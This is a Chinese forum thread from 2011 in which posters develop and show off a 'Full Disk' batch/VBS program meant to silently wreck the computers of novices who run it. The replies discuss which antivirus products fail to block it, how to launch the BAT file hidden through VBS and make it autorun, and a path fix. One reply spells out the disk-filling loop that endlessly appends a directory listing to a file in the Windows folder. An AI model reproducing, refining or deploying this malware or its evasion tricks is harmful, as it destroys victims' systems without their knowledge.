【最后更新，已完美】这是一个Full Disk程序，小白点击就会在不知不觉中完蛋

BHHZDQL

wanghai360good 发表于 2011-6-29 18:09
不过你这一招确实够狠的,那些单奔ESET、小红伞、avast、avg或是一些不带主防的杀软的十有八九会悲剧。

我可以更加狠

wanghai360good

hx1997 发表于 2011-6-29 18:10
ESET开HIPS不就好了
AVG也有智能主防，不知道能否防住

你试一下不就知道了,ESET默认的HIPS等于是个鸡肋,默认允许所有操作,只弹出个窗口来告诉你程序做了什么操作。

wanghai360good

BHHZDQL 发表于 2011-6-29 18:11
我可以更加狠

怎么个狠法

hx1997

BHHZDQL 发表于 2011-6-29 18:10
可是VBS在我的电脑上静默启动bat失败
XP下应该没有问题
其他电脑上应该可以正常静默启动

你的vbs里system32.bat是什么啊？只有system.bat吧，而且system.bat不在%windir%下，会找不到文件的吧

默默飞

kangzhen 发表于 2011-6-29 17:37
看不懂，但是知道这段代码好狠...

能不能大概解释一下这几句话是什么意思啊？

思齐鼠

这病毒好阴险释放bat··明明知道杀软都无视bat

BHHZDQL

hx1997 发表于 2011-6-29 18:16
你的vbs里system32.bat是什么啊？只有system.bat吧，而且system.bat不在%windir%下，会找不到文件的吧

等等，我修正一下

hx1997

wanghai360good 发表于 2011-6-29 18:13
你试一下不就知道了,ESET默认的HIPS等于是个鸡肋,默认允许所有操作,只弹出个窗口来告诉你程序做了什么操作 ...

我当然试了，当然我自己写了规则的~ 如果按默认设置那就会中招了
2011-6-29 18:18:24        G:\Documents and Settings\Administrator.HX-C0987054243B\桌面\0.exe        Start new application        G:\windows\System32\cmd.exe        blocked        48.%windir%\system32\cmd.exe       
然后就出错退出了

BHHZDQL

hx1997 发表于 2011-6-29 18:16
你的vbs里system32.bat是什么啊？只有system.bat吧，而且system.bat不在%windir%下，会找不到文件的吧

更新了
完美实现VBS隐藏启动BAT，完美实现自动运行，修正所有运行问题

wanghai360good

默默飞 发表于 2011-6-29 18:16
能不能大概解释一下这几句话是什么意思啊？

:dir --创建跳转标识符
dir C:\Windows\>>%windir%\system.dat --读取c:\windows目录下文件信息并写入c:\windows\system.dat文件
goto dir --跳转到dir标识符,相当于无限循环